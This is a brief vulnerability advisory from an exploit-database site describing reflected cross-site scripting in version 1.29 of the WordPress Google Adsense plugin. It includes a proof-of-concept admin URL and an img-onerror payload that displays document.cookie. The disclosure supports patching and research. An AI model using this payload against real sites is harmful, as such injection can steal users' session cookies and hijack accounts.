[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Google Adsense 1.29 Cross Site Scripting Vulnerability

Author
Madhu Akula
Risk
[
Security Risk Low
]
0day-ID
0day-ID-24755
Category
web applications
Date add
18-12-2015
Platform
php
WordPress Google Adsense 1.29 Cross Site Scripting Vulnerability

Plugin Name : Google Adsense
 
Effected Version : 1.29 (and most probably lower version's if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula
 

 
Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC - (Proof of Concept) :

http://localhost/wp-admin/admin.php?page=bws_plugins&action=system_status

In the field send to custom email put payload as -> ("><img src=x onerror=prompt(document.cookie)>)
 

Video Demonstration :

http://www.youtube.com/watch?v=jM0DuD-mtxk
 
Type of XSS : Reflected

#  0day.today [2024-11-15]  #